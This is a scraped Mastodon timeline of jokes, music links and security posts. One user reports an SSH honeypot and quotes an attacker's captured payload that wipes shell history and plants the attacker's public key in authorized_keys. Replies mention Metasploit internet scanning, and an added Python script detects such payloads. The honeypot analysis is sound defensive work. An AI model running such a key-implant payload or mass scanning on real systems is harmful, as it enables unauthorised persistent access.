Please use Firefox, if for no other reason than to keep the browser landscape diverse and alive.

BLUSTERY CUMULUS ORGANUR. NORCAL NOISEFEST - Sacramento, CA 2005.

youtu.be/7bsWuCffdP8

@RusstopiaLabs I don't have familiarity with it, but if you wanted to, you could scan the ipv4 net for infected hosts using msf's auxiliary/scanner/ssh/ssh_login_pubkey or maybe if you're doing internet-wide scanning find a native code version.

@RusstopiaLabs My logs are filled with Mar 1 04:15:53 sd-101242 sshd[30067]: Unable to negotiate with 49.88.112.67 port 49820: no matching key exchange method found. Their offer: ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [preauth]
because these dumb bots can't into ed25519.

@RusstopiaLabs seems the payload first tries to make sure the commands it executes don't end up in any command history, and then adds its own key to authorized_keys but deduplicated in case it was already there

Some blackhats attempting to penetrate my server this week.. rolled up an ssh honeypot based on github.com/jaksi/sshesame/ on port 22, to collect what the initial connect is doing (had to modify the code to accept legacy ssh-rsa HostKeys though, apparently hacks aren't yet using ssh-ed25519 by default):

Lessons so far, which should be obvious:

1. NEVER use the domain name, subdomains and/or any well-known service name your box may run as components of your passwords or usernames (e.g., <myserver>gogs, gogs<myserver>, ftpuser-<myserver>, ftp.<myserver>, etc.)

Payload attempts to install an ssh auth key to allow later access?

client=220.73.134.138:57604 password="<subdomain>@1234" user=oracle version="SSH-2.0-libssh2_1.8.0"

client=220.73.134.138:57604 payload=uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys request=exec

Anyone know what particular attack this is BTW? Would like to know more.
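Added example, not part of the post above and not sshesame's own code: a small triage script for honeypot lines in the key=value shape quoted in that post, flagging exec payloads that suppress shell history and write an inline public key into authorized_keys. The sample lines, documentation-range IPs and key placeholder are constructed, and the indicator names are assumptions chosen for this example.

```python
import re

# Constructed sample lines modelled on the honeypot output quoted in the post;
# the IPs are documentation ranges and the key is a placeholder.
SAMPLE_LOG = [
    'client=192.0.2.10:57604 password="example@1234" user=oracle version="SSH-2.0-libssh2_1.8.0"',
    "client=192.0.2.10:57604 payload=uname -a;unset HISTORY HISTFILE;export HISTFILE=/dev/null;"
    "export HISTSIZE=0;cd;mkdir .ssh;echo 'ssh-rsa AAAAPLACEHOLDER==' >> .ssh/.auth_k;"
    "mv .ssh/.auth_k .ssh/authorized_keys request=exec",
    "client=198.51.100.7:40112 payload=uname -a request=exec",
]

# Only lines that carry a payload are of interest here.
LINE_RE = re.compile(r"^client=(?P<client>\S+) payload=(?P<payload>.*) request=(?P<request>\S+)$")

# Hypothetical indicator names; each pattern mirrors a behaviour visible in the quoted payload.
INDICATORS = {
    "history_evasion": re.compile(
        r"\bunset\s+[^;]*\bHISTFILE\b|HISTFILE=/dev/null|HISTSIZE=0|HISTFILESIZE=0"),
    "authorized_keys_write": re.compile(
        r"(>>?|\bmv\b|\bcp\b|\btee\b)[^;|]*authorized_keys"),
    "inline_public_key": re.compile(
        r"\b(ssh-rsa|ssh-ed25519|ecdsa-sha2-\S+)\s+AAAA[0-9A-Za-z+/=]+"),
}


def classify(line):
    """Parse one log line; return None for lines without a payload (e.g. auth attempts)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(m["payload"]))
    return {"client": m["client"].rsplit(":", 1)[0], "request": m["request"], "indicators": hits}


def key_implants(lines):
    """Return client IPs whose payload writes an inline public key into authorized_keys."""
    wanted = {"authorized_keys_write", "inline_public_key"}
    return [ev["client"] for ev in map(classify, lines)
            if ev and wanted <= set(ev["indicators"])]


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
    print("key implants from:", key_implants(SAMPLE_LOG))
```
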

Religious people are wild they dedicate their lives to reading 1-2 books and STILL get them wrong

ADULT. - Blank Eyed Nose Bleed (2003)

youtube.com/watch?v=zOcUnwTGyJ

I'm coming to get you.
I'm coming to find you.
Say hello to your new best friend.

Wouldn't it be nice to go to a party
And be the only one there.

I've been working on increasing my anxiety
It's something I can do for free.

Seconds moving forward.
Second moving backward.

TeamViewer stores user passwords encrypted, not hashed:

whynotsecurity.com/blog/teamvi

– The key and IV are publicly known and identical for all users.
– Privilege escalation is possible in certain cases (CVE-2019-18988).

#teamviewer #privilegeescalation #vulnerability #security #infosec #cybersecurity

I just had an idea to put Edward Snowden's Permanent Record on my personal website. As the US Department of Justice sued Snowden's publisher, all of the profit goes to the government. As long as Macmillan breaks even, I think keeping Snowden's money away from the people who want him imprisoned for life is good reason to share the eBook.

Computer Secrets!

💻 Most computers flower only once every 100 years, but some flower and bear fruit each year if well watered and cared for

💻 The opposite of a computer is ghosts

💻 We all just pretend UNIX exists

💻 Processor cycles are marketing hype. We have all been on a 24-hour processor cycle since the early 1990s

💻 The Bible was originally written and compiled in QBASIC

💻 "USB keys" is the scientific term for computer egg sacs

💻 Variables with $ in their names are only usable by premium coders

Real [x] has never been tried. People don't know about [x] or they've been lied to about [x]. Or if they do have good information about [x] they are prevented from implementing [x] by others. If they aren't prevented from implementing [x] then they tried [x] wrong, or not hard enough, or for a long enough period of time. Because otherwise, clearly, we'd have [x].

Is [x] something you like or dislike?

Whatever [x] is for you, make sure you JOIN...

The Church of the SubGenius

subgenius.com

RT @zigzackly@twitter.activitypub.actor
Why protest? Why resist/

one of the best reasons to join the Church of the Subgenius - other Subgenii link you to amazing stuff like this.

CHICKEN PIG ATTACK - The Return of Takeo

youtube.com/watch?v=7dAUADjVzv

Nixtodon

This is an instance of Mastodon hosted on NixNet.xyz, a librehosting provider. There isn't really a specific topic; just enjoy your time here and have fun! 😉